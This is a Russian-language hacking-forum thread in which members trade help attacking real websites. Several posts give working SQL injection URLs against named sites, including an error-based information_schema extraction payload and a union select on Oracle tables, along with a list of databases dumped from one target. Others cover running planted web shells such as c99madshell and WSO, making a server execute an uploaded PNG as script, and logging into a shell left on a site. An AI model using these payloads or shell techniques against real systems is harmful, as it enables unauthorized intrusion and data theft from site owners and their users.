Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Господа, помогите раскрутить эту скулю:

    http://www.xakep.ru/local/include/voter_com.asp?action=add&filedir=2246941'&site=xakep
     
    4 people like this.
  2. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    А может кто-нидь реально рассказать, как самому сделать?
    А то всякие хеведжи не интересуют.
     
    _________________________
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    вбей в гугл хеш админа... боян этот сайт ..да и интересного ничего там нет ..только как спортивный интереc
     
  4. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    http://www.xakep.ru/local/include/voter_com.asp?action=add&site=xakep&filedir=(2246941)and(substring((db_name()),1,1)='w')
    Code:
    master
    tempdb
    model
    msdb
    forum_integr
    files
    wbanner
    wcounter
    wvote
    www
    wrate
    zbit_net_chat
    catalogs
    test
    forum_gameland
    forum_xakep
    
    Дальше тянуть не стал.
     
    _________________________
  5. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    http://www.candy.ru/detail.asp?PrId=690+and+1=0+union+all+select+null,null,null,null,null,null,null,null,null,table_name,null,null,null+from+sys.user_tables

    чем два дня ждать, пока кто-нибудь расскажет, хотя бы открыл мануал по ораклу и сам бы разбирался
    https://forum.antichat.ru/thread40576.html
     
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    а втойже папке где шелл, файлик есть ли такой .htaccess
    в котором должно быть прописано
    без этого сервер будет твой png читать как картинку а не как скрипт.
     
    _________________________
  7. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    404
    Likes Received:
    118
    Reputations:
    23
    на шелл есть права на чтение/выполнение?
    какое расширение у шелла? исполнительные ли файлы с этим расширением в .htaccess?
    шелл открывается как на скрине?
     
  8. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    404
    Likes Received:
    118
    Reputations:
    23
    залей нормальный шел https://rdot.org/forum/showthread.php?t=1085.
    А если шелл с расширением .php заливать он работает?
     
  9. Nolen88

    Nolen88 New Member

    Joined:
    26 Jul 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php
    вот кусок кода из шелла про авторизацию
    $login = "2";
    $pass = "2";
    $md5_pass = "c81e728d9d4c2f636f067f89cc14862c";
    не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    воспользуйся шеллом WSO самый простой и удобный шелл
     
    _________________________
  11. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Стоит phpMyAdmin 2.11.10
    Можно ли как нибудь раскрыть пути?
     
  12. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    $login = "root";
    $md5_pass = "c81e728d9d4c2f636f067f89cc14862c";


    логин root
    пасс 2
     
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Как насчет этой скули?

    Как ее крутить?
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    как то так

    http://bookmail.ru/shop/product/id/4380'+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+table_name+from+information_schema.tables+limit+0,1),1,64),floor(rand(0)*2)))+and+'1
     
    _________________________
    5 people like this.
  15. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Это круто!
     
  16. Nolen88

    Nolen88 New Member

    Joined:
    26 Jul 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Что то вы или невнимательно меня прочли или одно из двух, я не спрашиваю какой шелл мне лучше использовать потому что залит уже этот. Я не спрашиваю какой логин мне лучше использовать мне нужно объяснить как прописать в строке браузера логин и пароль чтобы шелл меня пустил, вот и все. Шелл лежит по адресу www.site.ru/faq.php
     
  17. AnGeI

    AnGeI Elder - Старейшина

    Joined:
    8 Dec 2008
    Messages:
    395
    Likes Received:
    79
    Reputations:
    16
    [​IMG]

    Нету никаких логинов, только пароль. Он передается через POST, если изменить на GET или REQUEST, то можно использовать: www.site.ru/faq.php?pass=qwerty
     
  18. Nolen88

    Nolen88 New Member

    Joined:
    26 Jul 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Вы издеваетесь? Я говорю шелл уже залит и поздняк метатся, нужно просто понять как он авторизуется, ведь авторизация в нем уже есть, просто я не знаю как в нее войти, c99madshell очень популярный шелл неужели никто им не пользовался?
     
  19. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    $login = "2"; // ЛОГИН (С) К.О.
    $pass = "2"; //ПАРОЛЬ (С) К.О
    $md5_pass = "c81e728d9d4c2f636f067f89cc14862c"; //ХЕШ ПАРОЛЯ (С) К.О.
    Если хеш стоит, то приоритет будет у $md5_pass, а не $pass, т.е. при авторизации будет использоваться захешированный пароль, а не тот который в plaintext.
     
  20. Nolen88

    Nolen88 New Member

    Joined:
    26 Jul 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Извените накипело просто ВЫ наркоманы шоле? Или вы просто посты набиваете и вам лишь бы сказать что нибудь? Я ЗНАЮ ЧТО ПАРОЛЬ 2, ЗНАЮ ЧТО ЛОГИН 2, знаю что хеш пароль 2, я сам это вписал. Я ЗНАЮ ЧТО приоритет будет у $md5_pass. Я разве спросил вас Какой у меня пароль? Я напрямую спрашиваю как вводить логин и пароль чтобы шелл принял его??? И жду ВОТ ТАКОГО ОТВЕТА: Пароль для авторизации нужно водить вот таким синтаксисом - http://site.com/faq.php?pass=c81e728d9d4c2f636f067f89cc14862c - это кстати неправильный вариант. Кто нибудь умеет авторизоваться в с99?
     
Thread Status:
Not open for further replies.